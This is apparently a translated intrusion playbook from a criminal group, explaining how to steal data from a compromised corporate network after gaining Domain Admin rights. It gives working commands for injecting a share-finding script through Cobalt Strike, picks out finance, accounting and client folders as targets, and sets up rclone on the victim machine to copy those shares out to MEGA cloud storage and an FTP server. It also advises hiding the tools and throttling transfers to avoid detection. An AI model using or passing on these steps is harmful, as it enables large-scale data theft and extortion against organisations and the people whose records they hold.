HOW AND WHAT KIND OF INFO TO DOWNLOAD
1) After we elevated our privileges, found the Admin Domain, we draw the session to cobalt
2)We put on the DA token and extract from the shares in this way: *powershell-import - we'll send ShareFinder there as usual and give the following command - psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt Next, we study the extracted information, we are interested in * Finance documents * Accounting * IT * Clients * Projects And so on, it all depends on what our target is doing, Then we do the following > here is the Manual from Diablo, all lego is available and understandable.
RCLONE. In order to start downloading through rclone, you need to create a config. To create a config, you need to open cmd go to the directory where it lies rclone.exe launching rclone.exe using the command : rclone config
Next, select new remote in the menu that appears, call it mega, then enter mega again, then enter the mail address of megi after he asks for his pass to enter or generate, we select our pass with the letter 'Y', the pass will not appear when inserted, however, it is still inserted there after creating the config, we are thrown into the main menu and we exit the rclone.
Next, enter this command rclone.exe config show it will show the config itself that we created, we copy it and create the rclone.conf file where we put this info.
After we have found the shares we are interested in, we upload the exe and config to the target machine with the rights, hide the config and the executable so that they are not found, go to the executable directory and give the command: shell rclone.exe copy "\\<redacted>.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 where: \\<redacted>.com\IT\KLSHARE these are shares Mega:Finanse the location of files in mega (can independently create a folder in mega, it is only necessary to specify it here) streams 12 --transfers 12 is the number of streams that are pumped to a maximum (12) I do not recommend since you can easily burn shell rclone.exe copy "\\<redacted>.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - here is an example in this case on FTP !!!THE RCLONE ITSELF WEIGHS ABOUT 50MB, THE LINK TO IT WILL BE BELOW THE POST!!!
